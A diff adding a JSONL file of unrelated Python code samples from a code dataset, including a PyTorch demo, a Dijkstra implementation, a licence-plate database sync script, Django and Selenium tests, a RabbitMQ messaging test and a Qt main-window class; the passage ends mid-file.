diff --git "a/304.jsonl" "b/304.jsonl" new file mode 100644--- /dev/null +++ "b/304.jsonl" @@ -0,0 +1,673 @@ +{"seq_id":"182826573","text":"import torch\nfrom torch.autograd import Variable\n\ntensor = torch.FloatTensor(([1,2],[3,4]))\nvariable = Variable(tensor,requires_grad = True)\n\nt_out = torch.mean(tensor*tensor) #compute tenser^2\nv_out = torch.mean(variable*variable)\n\nprint(t_out)\nprint(v_out)\n\nv_out.backward() #反向传播\nprint(variable.grad) #打印结果\n\n#Variable对tensor进行封装\n#即Variable.data 就是封装的tensor\n#tensor和numpy.array可以转化\n#Variable.data.numpy()即可实现与numpy的转化\nprint(variable.data.numpy())\n","sub_path":"python/learnPyTorch/517/demoTorch.py","file_name":"demoTorch.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"67481646","text":"# 0012\n# 2018/08/02\n# 当用户输入敏感词语,则用 星号 * 替换。\n\n__author__ = 'czhzz'\n\ndef filter_word(text):\n f = open('filtered_words.txt', encoding='utf-8')\n for word in f.read().split('\\n'):\n if word in text:\n text = text.replace(word, '*' * len(word))\n return text\n\nif __name__ == '__main__':\n text = input('>')\n output = filter_word(text)\n print(output)\n","sub_path":"0012/0012.py","file_name":"0012.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"626332220","text":"# -*- coding: utf-8 -*-\nimport utils, os\n\nversion = '3.5'\nsystem_model = 'Allocation, APOS'\nfolder = utils.version_system_model_path(version, system_model)\nfilelist = utils.build_file_list(os.path.join(folder, 'datasets'))\nfilelist = set([x.split('.')[0] for x in filelist])\npdf_list = utils.build_file_list(os.path.join(folder, 'pdf'))\npdf_list = set([x.split('.')[0].lower() for x in pdf_list])\nmissing_pdf = filelist.difference(pdf_list)\n\nao = utils.pkl_load(os.path.join(folder, 'pkl'), 'ao')\nao_filelist = set(ao['filename'])\nfilelist = set(utils.build_file_list(os.path.join(folder, 'datasets')))\nfilelist.issubset(ao_filelist)\nao_filelist.issubset(filelist)","sub_path":"projects/short_scripts/missing_PDF.py","file_name":"missing_PDF.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"112607225","text":"import json\nimport os\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom unittest import mock\n\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\nfrom django_dynamic_fixture import get\n\nfrom readthedocs.embed.views import do_embed\nfrom readthedocs.projects.constants import MKDOCS\nfrom readthedocs.projects.models import Project\n\ndata_path = Path(__file__).parent.resolve() / 'data'\n\n\n@override_settings(\n USE_SUBDOMAIN=True,\n PUBLIC_DOMAIN='readthedocs.io',\n DEBUG=True,\n)\nclass APITest(TestCase):\n\n def setUp(self):\n self.project = get(\n Project,\n main_language_project=None,\n slug='project',\n )\n\n def _mock_open(self, content):\n @contextmanager\n def f(*args, **kwargs):\n read_mock = mock.MagicMock()\n read_mock.read.return_value = content\n yield read_mock\n return f\n\n @mock.patch('readthedocs.embed.views.build_media_storage')\n def test_embed_sphinx(self, storage_mock):\n json_file = data_path / 'sphinx/latest/index.fjson'\n html_content = data_path / 'sphinx/latest/index.html'\n\n json_content = json.load(json_file.open())\n json_content['body'] = html_content.open().read()\n\n storage_mock.exists.return_value = True\n storage_mock.open.side_effect = self._mock_open(\n json.dumps(json_content)\n )\n\n response = do_embed(\n project=self.project,\n version=self.project.versions.first(),\n doc='index',\n section='Features',\n path='index.html',\n )\n\n expected = {\n 'content': [],\n 'headers': [\n {'Welcome to Read The Docs': '#'},\n ],\n 'url': 'http://project.readthedocs.io/en/latest/index.html',\n 'meta': {\n 'project': 'project',\n 'version': 'latest',\n 'doc': 'index',\n 'section': 'Features',\n },\n }\n\n self.assertDictEqual(response.data, expected)\n\n @mock.patch('readthedocs.embed.views.build_media_storage')\n def test_embed_mkdocs(self, storage_mock):\n json_file = data_path / 'mkdocs/latest/index.json'\n storage_mock.exists.return_value = True\n storage_mock.open.side_effect = self._mock_open(\n json_file.open().read()\n )\n\n self.project.versions.update(documentation_type=MKDOCS)\n\n response = do_embed(\n project=self.project,\n version=self.project.versions.first(),\n doc='index',\n section='Installation',\n path='index.html',\n )\n\n expected = {\n 'content': mock.ANY, # too long to compare here\n 'headers': [\n {'Overview': 'overview'},\n {'Installation': 'installation'},\n {'Getting Started': 'getting-started'},\n {'Adding pages': 'adding-pages'},\n {'Theming our documentation': 'theming-our-documentation'},\n {'Changing the Favicon Icon': 'changing-the-favicon-icon'},\n {'Building the site': 'building-the-site'},\n {'Other Commands and Options': 'other-commands-and-options'},\n {'Deploying': 'deploying'},\n {'Getting help': 'getting-help'},\n ],\n 'url': 'http://project.readthedocs.io/en/latest/index.html',\n 'meta': {\n 'project': 'project',\n 'version': 'latest',\n 'doc': 'index',\n 'section': 'Installation',\n },\n }\n self.assertDictEqual(response.data, expected)\n","sub_path":"readthedocs/embed/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"113999371","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport math\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport bellamn_ford\nimport johnson\n\ndef a(G,l,b):#funkcja, która zwraca wagę połączenia dwóch krawędzi przekazanych do tej funkcji\n waga = 0\n for i in G[l]:\n if i[0] == b: #zawarte jest tu i[0], z uwagi na reprezentacje grafu\n waga = i[1]\n return waga\n\n\ndef dijkstra(G,s,w = 1):#s to wierzchołek startowy\n p = {} #słownik zawierający poprzednio odwiedzone wierzchołki\n d = {} #słownik zawierający odległości od wierchołka początkowego\n f = {} #pomocnicza zmienna, która będzie równa początkowo d a później poszczególne elementy będą zerowane\n Q = [] #zbiór wierzchołków bez wyznaczonej minimalnej ścieżki\n\n for u in G: #nadaje każdemu poprzednikowi wierzchołka wartość 0 oraz\n #odelgłość równą nieskończoność\n p[u] = 0\n d[u] = math.inf\n f[u] = math.inf\n Q.append(u)\n Q.remove(s)\n d[s] = 0\n f[s] = 0\n u_prim = s\n A= []\n while Q : #przechodzenie po zbiorze nieodwiedzonych wierchołków\n sasiedzi = []\n for u in G[u_prim]:\n sasiedzi.append(u[0])\n lst = [value for value in sasiedzi if value in Q] #sprawdzam, które wierzchołki są jednoccześnie w Q i w sąsiadach\n #danego wierzchołka\n for u in lst:\n if d[u_prim] + a(G, u_prim,u) < d[u]: #przypisanie nowej wartości odległości jeśli jest spełniony warunek\n d[u] = d[u_prim] + a(G, u_prim,u)\n f[u] = d[u]\n p[u] = u_prim\n wartosci_f = []\n for k in f : # dodaje wartości beta do listy w celu znalezienia minimum\n wartosci_f.append(f[k])\n m = min(i for i in wartosci_f if i > 0 ) # dostaje index wartości minimalnej znajdującej się w liście\n index = wartosci_f.index(m)\n licznik = 0\n for k in f: # teraz szukam, która wartość w f odpowiada wartości znalezionemu indexowi\n if licznik == index:\n u_pomocnicze = k\n f[k] = 0 # usuwam z f wartość pod wierzchołkiem k aby móc w następnyhc iteracjach znaleźć łatwiej minimalną wartość\n break\n licznik += 1\n u_prim = u_pomocnicze\n\n Q.remove(u_prim) #usunięcie z Q odwiedzonego wierzchołka\n\n A.append(w) #wypisanie odwiedzonych wierzchołków\n for i in range(len(G)):\n if p[w] != 0:\n q = p[w]\n A.append(q)\n w = q\n return A[::-1], d\n\ndef adding_and_showing(G):\n Gr = nx.Graph()\n for i in G:\n for j in G[i]:\n Gr.add_edge(i,j[0], weight = j[1])\n pos = nx.spring_layout(Gr)\n nx.draw(Gr, pos=pos, with_labels=True, font_weight='bold')\n nx.draw_networkx_edge_labels(Gr, pos, edge_labels=nx.get_edge_attributes(Gr, 'weight'))\n plt.show()\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n G = {\n 1: [[2, 4], [3, 2], [4, 5], [5, 2]],\n 2: [[1, 4], [4,4], [7, 1], [8, 2]],\n 3: [[1, 2], [4, 2], [5, 2], [6, 2]],\n 4: [[1, 5], [2, 4], [3, 2], [6, 4], [7, 2]],\n 5: [[1, 2], [3, 2], [6, 9]],\n 6: [[3, 2], [4, 4], [5, 9]],\n 7: [[2, 1], [4, 2], [8, 2]],\n 8: [[2, 2], [7, 2], [9, 2], [10, 7]],\n 9: [[8, 2], [10, 11]],\n 10: [[9, 11], [8, 7]]\n }\n G_p = {\n 1:[[2,-4],[8,8]],\n 2:[[1,-4],[3,8],[8,11]],\n 3:[[2,8],[9,2],[6,4],[4,-7]],\n 4:[[3,-7],[6,14],[5,9]],\n 5:[[4,9],[6,10]],\n 6:[[3,4],[4,14],[5,10],[7,2]],\n 7:[[6,2],[8,1],[9,6]],\n 8:[[1,8],[2,11],[7,1],[9,7]],\n 9:[[3,2],[7,6],[8,7]]\n }\n\n aa, g = dijkstra(G, 1, 3)\n adding_and_showing(G)\n print(aa)\n print(g)\n\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"330922459","text":"import argparse\nimport csv\nimport datetime\nimport logging\nimport multiprocessing\nimport os\nimport time\nimport sys\nfrom collections import namedtuple\n\nimport numpy as np\n\nfrom wsnsims.conductor import sim_inputs\nfrom wsnsims.core.environment import Environment\nfrom wsnsims.core.results import Results\nfrom wsnsims.loaf.loaf_sim import LOAF\n\nlogging.basicConfig(level=logging.WARNING)\nlogger = logging.getLogger(__name__)\n\nRUNS = 50\nWAIT_TIME = 100\n\nParameters = namedtuple('Parameters',\n ['segment_count', 'mdc_count', 'isdva', 'isdvsd',\n 'radio_range'])\n\n\ndef average_results(results):\n mean_max_delay = np.mean([x.max_delay for x in results])\n mean_balance = np.mean([x.balance for x in results])\n mean_lifetime = np.mean([x.lifetime for x in results])\n mean_energy = np.mean([x.ave_energy for x in results])\n mean_buffer = np.mean([x.max_buffer for x in results])\n\n result = Results(mean_max_delay, mean_balance, mean_lifetime, mean_energy,\n mean_buffer)\n return result\n\ndef run_loaf(parameters):\n \"\"\"\n\n :param parameters:\n :type parameters: Parameters\n :return:\n \"\"\"\n\n env = Environment()\n env.segment_count = parameters.segment_count\n env.mdc_count = parameters.mdc_count\n env.isdva = parameters.isdva\n env.isdvsd = parameters.isdvsd\n env.comms_range = parameters.radio_range\n\n loaf_sim = LOAF(env)\n\n print(\n \"Starting LOAF at {}\".format(datetime.datetime.now().isoformat()))\n print(\"Using {}\".format(parameters))\n start = time.time()\n runner = loaf_sim.run()\n\n results = Results(runner.maximum_communication_delay(),\n runner.energy_balance(),\n 0.,\n runner.average_energy(),\n runner.max_buffer_size())\n\n print(\"Finished LOAF in {} seconds\".format(time.time() - start))\n return results\n\ndef run(parameters):\n\n loaf_results = []\n\n with multiprocessing.Pool() as pool:\n\n while len(loaf_results) < RUNS:\n\n loaf_workers = []\n\n if len(loaf_results) < RUNS:\n loaf_workers = [\n pool.apply_async(run_loaf, (parameters,))\n for _ in range(RUNS - len(loaf_results))]\n\n for result in loaf_workers:\n try:\n loaf_results.append(result.get(timeout=WAIT_TIME))\n except Exception:\n logger.exception('LOAF Exception')\n continue\n\n mean_loaf_results = loaf_results[:RUNS]\n\n return (mean_loaf_results)\n\n\ndef get_argparser():\n parser = argparse.ArgumentParser()\n parser.add_argument('--outdir', '-o', type=os.path.realpath, default='results')\n\n return parser\n\n\ndef main():\n parser = get_argparser()\n args = parser.parse_args()\n\n start = time.time()\n seed = int(time.time())\n print(\"Random seed is %s\", seed)\n np.random.seed(seed)\n\n parameters = [Parameters._make(p) for p in sim_inputs.conductor_params]\n\n headers = ['max_delay', 'balance', 'lifetime', 'ave_energy', 'max_buffer']\n # noinspection PyProtectedMember\n headers += parameters[0]._fields\n\n results_dir = args.outdir\n if not os.path.isdir(results_dir):\n os.makedirs(results_dir)\n\n loaf_filepath = os.path.join(results_dir, 'loaf.csv')\n \n loaf_exists = os.path.isfile(loaf_filepath)\n\n with open(loaf_filepath, 'w', newline='') as loaf_csv:\n\n loaf_writer = csv.DictWriter(loaf_csv, fieldnames=headers)\n \n if not loaf_exists:\n loaf_writer.writeheader()\n\n for parameter in parameters:\n loaf_res = run(parameter)\n\n for res in loaf_res:\n loaf_writer.writerow(\n {**res._asdict(), **parameter._asdict()})\n loaf_csv.flush()\n\n finish = time.time()\n delta = finish - start\n print(\"Completed simulation in {} seconds\".format(delta))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"wsnsims/conductor/loafdriver.py","file_name":"loafdriver.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"365738312","text":"from django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium.webdriver.firefox.webdriver import WebDriver\n\n\nclass SalesBackendTest(StaticLiveServerTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(SalesBackendTest, cls).setUpClass()\n cls.selenium = WebDriver()\n cls.selenium.implicitly_wait(10)\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super(SalesBackendTest, cls).tearDownClass()\n\n def test_connect(self):\n url = 'http://localhost:8000/sales/listsorders'\n self.selenium.get(url)\n self.selenium.find_element_by_id('id_customer_staff')","sub_path":"sales/tests/test_liveserver.py","file_name":"test_liveserver.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"12812161","text":"#Deep Dream imports\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image\n\n\nimport sys\nimport lib.transforms as transforms\nfrom lib.utils import azim_proj\nfrom lib.BCI import BCI\nfrom lib.DeepDream import DeepDream, calc_loss\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\nimport cv2\n\n# Normalize an image\ndef deprocess(img):\n img = 255*(img + 1.0)/2.0\n return tf.cast(img, tf.uint8)\n\n\ndef run_deep_dream_simple(img, steps=100, step_size=0.01):\n\n # Convert from uint8 to the range expected by the model.\n img = tf.keras.applications.inception_v3.preprocess_input(img)\n img = tf.convert_to_tensor(img)\n step_size = tf.convert_to_tensor(step_size)\n steps_remaining = steps\n step = 0\n while steps_remaining:\n if steps_remaining>100:\n run_steps = tf.constant(100)\n else:\n run_steps = tf.constant(steps_remaining)\n steps_remaining -= run_steps\n step += run_steps\n\n loss, img = dream(img, run_steps, tf.constant(step_size))\n\n #display.clear_output(wait=True)\n #show(deprocess(img))\n #print (\"Step {}, loss {}\".format(step, loss))\n\n\n result = deprocess(img)\n #display.clear_output(wait=True)\n #show(result)\n\n return np.array(result)\n\n\nif __name__ == '__main__':\n print(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\n band_freqs = { 'Delta' : (0, 4), # index: 0\n 'Theta' : (4, 7), # index: 1\n 'Alpha' : (7, 15), # index: 2\n 'Beta' : (15, 31), # index: 3\n 'Gamma' : (31, 45) } # index: 4\n\n base_model = tf.keras.applications.InceptionV3(include_top=False, weights='imagenet')\n\n # Maximize the activations of these layers\n names = ['mixed3', 'mixed5']\n layers = [base_model.get_layer(name).output for name in names]\n\n # Create the feature extraction model\n dream_model = tf.keras.Model(inputs=base_model.input, outputs=layers)\n dream = DeepDream(dream_model)\n\n\n bci = BCI(band_freqs, blue=1, green=2, red=4)\n while True:\n\n # Run LSL in Band Power Mode, 16 channels\n #cv2.imshow('', cv2.resize(bci.plot_fft_bashivan(50), (600,600), interpolation=cv2.INTER_CUBIC))\n #cv2.waitKey(1)\n\n # Run LSL in FFT Mode, 125 channels\n #cv2.imshow('', bci.plot_fft_naive(600))\n #cv2.waitKey(1)\n img = bci.plot_fft_bashivan(50)\n img = run_deep_dream_simple(img=img, steps=100, step_size=0.01)\n cv2.imshow('', cv2.resize(img, (1000,1000), interpolation=cv2.INTER_CUBIC))\n cv2.waitKey(1)\n\n\n print('done')\n exit(0)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"11946254","text":"import numpy as np\nfrom numpy.random import seed\nfrom scipy.optimize import fmin_cobyla\nimport math\nimport random\nfrom distanceToCurve import distanceToCurve\nimport seeding\n#import timeit\n\n# seed for reproduceable datasets\nseedNum = seeding.getSeed()\n\n#Vector function\ndef genFunctionUniform(degree = 2,minimum = -7,maximum = 7):\n coefficients = []\n for i in range(degree+1):\n random.seed(seedNum)\n coefficient = random.randrange(minimum,maximum)\n coefficients.insert(0,coefficient)\n return coefficients\n\ndef genFunctionGaussian(degree = 2,mean = 0,sigma = 7, scaling = False):\n coefficients = []\n for i in range(degree+1):\n if(scaling):\n eSigma = sigma/(i+1)\n else:\n eSigma = sigma\n coefficient = gauss(mean,eSigma)\n coefficients.append(coefficient)\n return coefficients\n\ndef evalFunction(coVec,ipVar):\n boundaryPoint = 0\n maximum = len(coVec) - 1\n for i in range(len(coVec)):\n power = maximum - i\n termVal = pow(ipVar,power)*coVec[power]\n boundaryPoint += termVal\n return boundaryPoint\ndef pointDistance(x1,y1,x2,y2):\n return np.sqrt(pow((x1-x2),2)+pow((y1-y2),2))\n'''\ndef distanceToCurve(coVec,ipVar,dpVar):\n maxDistance = abs(dpVar - evalFunction(coVec, ipVar))\n xMin = fmin_cobyla(\\\n lambda x: pointDistance(ipVar,dpVar,x[0],evalFunction(coVec, x[0]))\\\n ,x0 = [ipVar,ipVar],\\\n cons = [lambda x: abs(ipVar-maxDistance)],\\\n rhoend = 1e-3)\n return pointDistance(ipVar,dpVar,xMin[0], evalFunction(coVec, xMin[0]))\n'''\ndef gauss(distance, sigma):\n sigmaComponent = pow(sigma,2)*2\n #denominator = math.sqrt(math.pi*sigmaComponent)\n #I want to control the max height\n denominator = 1\n if( sigmaComponent == 0):\n return 0\n numerator = math.exp(-pow(distance,2)/sigmaComponent)\n return numerator/denominator\n\n# [1,1] y = x + 0, y = x + 1\ndef getPoints(coVec,numPoints,sigma,peak,xMin,xMax,yMin,yMax):\n seed(seedNum)\n x = np.random.rand(numPoints)\n xRange = xMax - xMin\n x = list(map(lambda v: (v*xRange)+xMin,x))\n seed(seedNum*2)\n y = np.random.rand(numPoints)\n yRange = yMax - yMin\n y = list(map(lambda v: (v*yRange)+yMin,y))\n boundaryPoints = np.polyval(coVec,x)\n distances = list(map(lambda m,n: distanceToCurve(coVec,m,n),x,y))\n distances = list(map(lambda x:peak*x,distances))\n gaussian = list(map(lambda d: gauss(d,sigma),distances))\n seed(seedNum)\n flip = list(map(lambda g: (np.random.uniform()b),y,boundaryPoints))\n dirtyVals = list(map(lambda v,f: v^f, cleanVals,flip))\n points = list(map(lambda i,d,v: [i,d,v],x,y,dirtyVals))\n return points\n","sub_path":"GaussianBoundary.py","file_name":"GaussianBoundary.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"624031606","text":"# structure dosyasindan Student yapisini(kavramini)\n# yukluyorum. Boylece ogrenci kavrami bu baglamda\n# bilinen bir kavram haline geliyor.\nfrom structure import Student\n\n# ogrenci kayitlarini tutmak icin bir liste olusturuyorum\nstudents = []\n\n# kullanicidan kac tane kayit alcagimi belirliyorum\nfor i in range(2):\n name = input(\"name: \")\n dorm = input(\"dorm: \")\n favorite_class = input(\"favorite class: \")\n\n # create a variable which will cary subject with its attributes\n s = Student(name, dorm, favorite_class)\n students.append(s)\n\n\n# print out all information in students list\nfor student in students:\n print(\"{} lives in {} and likes {}\".format(student.name,\n student.dorm,\n student.favorite_class))\n","sub_path":"learning_python/test_pys/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"333924072","text":"import csv\nfrom time import sleep\nimport storage\nimport time\nimport storage\nfrom datetime import datetime\nimport time\nimport csv\nimport mmap\nimport os\n\n###########################transmision data to db####################################\ndef update_db(txx,rid,timestr,datestr):\n\n timebty = bytearray(timestr, 'utf-8')\n datebty = bytearray(datestr, 'utf-8')\n txx = bytearray(txx, 'utf-8')\n rid = bytearray(rid, 'utf-8')\n conn = storage.connect()\n c = conn.cursor(buffered =True)\n c.execute(\"SELECT * FROM veh_all_bl where veh_no=%s\",(txx,))\n row = c.fetchone()\n if not row :\n #print(\"Not exist\")\n c.execute(\"SELECT MAX(veh_id) FROM veh_all_bl\")\n row1= c.fetchone()\n new_id=row1[0]+1\n #print(row1[0])\n c.execute(\"INSERT INTO veh_all_bl(veh_id,veh_no) VALUES(%s,%s)\",(new_id,txx))\n time.sleep(0.1)\n c.execute(\"INSERT INTO veh_lpinfotbl(lp_noid,ckpnt_id,lp_time,lp_date) VALUES(%s,%s,%s,%s)\",(new_id,rid,timebty,datebty))\n else:\n #print (\"exist\")\n c.execute(\"SELECT veh_id FROM veh_all_bl WHERE veh_no =%s\",(txx,))\n row2= c.fetchone()\n c.execute(\"INSERT INTO veh_lpinfotbl(lp_noid,ckpnt_id,lp_time,lp_date) VALUES(%s,%s,%s,%s)\",(row2[0],rid,timebty,datebty))\n time.sleep(0.1)\n conn.commit()\n c.close()\n#############################send data ###################################\ndef transmit_no(x,rid,timest,datest):\n try:\n #conn = storage.connect()\n #c = conn.cursor()\n #############################\n print(\"Sending new data.\")\n update_db(x,rid,timest,datest)\n #c.execute(\"INSERT INTO veh_lpinfotbl(lp_no, lp_date, lp_time,chkpnt_id) VALUES(%s, %s, %s,%s)\",(x,datestr,timestr,rid))\n # inserted=True\n #conn.commit()\n #c.close()\n print(\"Sending new data is done....\")\n except Exception as e:\n print (e)\n sleep(1)\n print(\"No conncetion to DB. Saving offline\")\n z= open('ins.txt','a')\n #z.write(x +'\\n')\n z.write(x +',')\n z.write(datest +',')\n z.write(timest +',')\n z.write(rid +'\\n')\n z.close()\n print(\"Saving offline is done\")\n finally:\n if check(x):\n #print('Violated')\n return (False)\n else:\n #print('PASS')\n return (True)\n#########################resend unsent data########################################\ndef re_send():\n #conn = storage.connect()\n #c = conn.cursor()\n #############################upload old\n f= open('ins.txt','rt')\n #f.seek(0) #ensure you're at the start of the file..\n first_char = f.read(1) #get the first character\n if first_char:\n print (\"There are unsent data.....Sending\")\n #print (first_char)\n f.seek(0)\n reader = csv.reader(f, delimiter = ',', skipinitialspace=True)\n lineData = list()\n #cols = next(reader) skip the first lineData\n cols = reader\n\n for line in reader:\n if line != []:\n lineData.append(line)\n for i in range(len(lineData)):\n #c.execute(\"INSERT INTO veh_lpinfotbl(lp_no, lp_date, lp_time,chkpnt_id) VALUES(%s, %s, %s,%s)\",(lineData[i][0],lineData[i][1],lineData[i][2],lineData[i][3]))\n update_db(lineData[i][0],lineData[i][3],lineData[i][2],lineData[i][1])\n f.close()\n f = open('ins.txt', 'w') # to empty the file\n f.close()\n print(\"Sending old data is done.\")\n else:\n print(\"There are no unsent data\")\n\n\n#######################chk if viol table in db was modified#####################################\ndef chkdbtime():\n try:\n conn = storage.connect()\n c = conn.cursor(buffered=True)\n c.execute(\"SELECT UPDATE_TIME FROM information_schema.tables WHERE TABLE_SCHEMA = 'db_lp_ckpnt20193' AND TABLE_NAME = 'veh_all_bl'\")\n c.execute(\"SELECT UPDATE_TIME FROM information_schema.tables WHERE TABLE_SCHEMA = 'db_lp_ckpnt20193' AND TABLE_NAME = 'veh_lpinfotbl'\")\n\n y=c.fetchone()\n tdb = y[0] #the data from db is tuple, convert it to date timetuple\n tdb = datetime.strptime(str(tdb), \"%Y-%m-%d %H:%M:%S\")\n tdb=str(tdb)\n conn.commit()\n c.close()\n return (tdb)\n except Exception as e:\n print (e)\n pass\n#######################check if lp is violation#####################################\ndef check(x):\n fo = open(\"viol.txt\", \"r\")\n file_contents = fo.read()\n Flag = 0\n for i in file_contents.split('\\n'):\n if x == i:\n Flag = 1\n if Flag == 1:\n return True\n else:\n return False\n#######################get viol from db#####################################\ntold =time.strftime('2019-08-29 10:22:22')\ndef get_viol():\n global told\n try:\n conn = storage.connect()\n c = conn.cursor(buffered=True)\n tnew=chkdbtime()\n if tnew>told:\n print(\"Updating viol list\")\n #c.execute(\"SELECT veh_no FROM veh_all_bl WHERE bl_flg=%s\",(bl,))\n f= open('viol.txt','w')\n c.execute(\"SELECT veh_no FROM veh_all_bl WHERE bl_flg='1'\")\n rows = c.fetchall()\n for row in rows:\n #print(row[0])\n f.write(row[0] +'\\n')\n f.close\n conn.commit()\n c.close()\n told=tnew\n else: print(\"no viol updates\")\n except Exception as e:\n print (e)\n pass\n#########################fetch viol from db and resend unsent data#################################\ndef all_a():\n while True:\n try:\n if os.path.getsize(\"ins.txt\") > 0: \n re_send() \n else:\n print(\"Nothing to send\")\n get_viol()\n '''\n x='111111'\n if check(x):\n print('True')\n else:\n print('False')\n '''\n time.sleep(5)\n except Exception as e:\n print (\"no connection to db\")\n pass\n##################################################################\n","sub_path":"object_detection/send_check.py","file_name":"send_check.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"141675568","text":"#!/usr/bin/env python\nimport pika, os\nimport logging\nimport subprocess\nimport sys\nimport json\n\ncredentials = pika.PlainCredentials('pubsub','pubsub')\nparams = pika.ConnectionParameters(host='optimum.euprojects.net',port=8925,credentials=credentials)\n\nconnection = pika.BlockingConnection(params)\n\nchannel = connection.channel()\nchannel.exchange_declare(exchange='events',type='fanout')\n\nresult = channel.queue_declare(exclusive=True)\nqueue_name = result.method.queue\n\nchannel.queue_bind(exchange='events',\n queue=queue_name)\nchannel1 = connection.channel()\nchannel1.exchange_declare(exchange='notifications',type='fanout')\n\nresult1 = channel1.queue_declare(exclusive=True)\nqueue_name1 = result1.method.queue\n\nchannel1.queue_bind(exchange='notifications',\n queue=queue_name1)\n\nprint(' [*] Waiting for logs. To exit press CTRL+C')\n\ndef on_message(ch, method, properties, body):\n print(\" [x] %r\" % body)\n new = json.loads(body)\n new['notification'] = \"notification_text\"\n new['confidence_level'] = \"75%\"\n new['user_id']= \"userID\"\n mes=json.dumps(new)\n #channel.basic_ack(delivery_tag=method.delivery_tag)\n channel1.basic_publish(exchange='notifications',routing_key='',body=mes, \n\t\t\tproperties=pika.BasicProperties(reply_to = queue_name1),mandatory=True)\n\n\nchannel.basic_consume(on_message,\n queue=queue_name,\n no_ack=True)\n\nchannel.start_consuming()\n","sub_path":"test_send_event.py","file_name":"test_send_event.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"569304122","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Philipp Temminghoff\n\"\"\"\n\nfrom typing import Union\nimport logging\n\nimport qtawesome as qta\nfrom qtpy import QtCore, QtWidgets, QtGui\n\nfrom prettyqt import core, widgets, gui\nfrom prettyqt.utils import bidict\n\n\nDOCK_POSITIONS = bidict(top=QtCore.Qt.TopDockWidgetArea,\n bottom=QtCore.Qt.BottomDockWidgetArea,\n left=QtCore.Qt.LeftDockWidgetArea,\n right=QtCore.Qt.RightDockWidgetArea)\n\nTOOLBAR_AREAS = bidict(left=QtCore.Qt.LeftToolBarArea,\n right=QtCore.Qt.RightToolBarArea,\n top=QtCore.Qt.TopToolBarArea,\n bottom=QtCore.Qt.BottomToolBarArea,\n all=QtCore.Qt.AllToolBarAreas,\n none=QtCore.Qt.NoToolBarArea)\n\n\nQtWidgets.QMainWindow.__bases__ = (widgets.Widget,)\n\n\nclass MainWindow(QtWidgets.QMainWindow):\n \"\"\"\n Class for our mainWindow\n includes all docks, a centralwidget and a toolbar\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setDockOptions(self.AllowTabbedDocks |\n self.AllowNestedDocks |\n self.GroupedDragging |\n self.AnimatedDocks)\n\n def __getitem__(self, index):\n return self.findChild(QtWidgets.QWidget, index)\n\n def __getstate__(self):\n icon = gui.Icon(self.windowIcon())\n return dict(central_widget=self.centralWidget(),\n title=self.windowTitle(),\n is_maximized=self.isMaximized(),\n icon=icon if not icon.isNull() else None,\n size=(self.size().width(), self.size().height()))\n\n def __setstate__(self, state):\n self.__init__()\n self.title = state[\"title\"]\n self.set_icon(state[\"icon\"])\n if state[\"central_widget\"]:\n self.setCentralWidget(state[\"central_widget\"])\n self.resize(state[\"size\"])\n if state[\"is_maximized\"]:\n self.showMaximized()\n self.resize(*state[\"size\"])\n self.box = self.layout()\n\n def set_widget(self, widget):\n self.setCentralWidget(widget)\n\n def createPopupMenu(self):\n # qactions = self.createPopupMenu()\n menu = widgets.Menu(parent=self)\n for i, item in enumerate(self.get_docks()):\n action = widgets.Action(item.windowTitle(), parent=self)\n action.set_checkable(True)\n action.set_checked(item.isVisible())\n action.set_shortcut(f\"Ctrl+Shift+{i}\")\n action.set_shortcut_context(\"application\")\n action.toggled.connect(item.setVisible)\n menu.add_action(action)\n menu.add_separator()\n for i in self.get_toolbars():\n action = widgets.Action(i.windowTitle(), parent=self)\n action.set_checkable(True)\n action.toggled.connect(i.setVisible)\n action.set_checked(i.isVisible())\n menu.add_action(action)\n return menu\n\n def add_toolbar(self, toolbar, position: str = \"top\"):\n \"\"\"adds a toolbar to the mainmenu at specified area\n\n 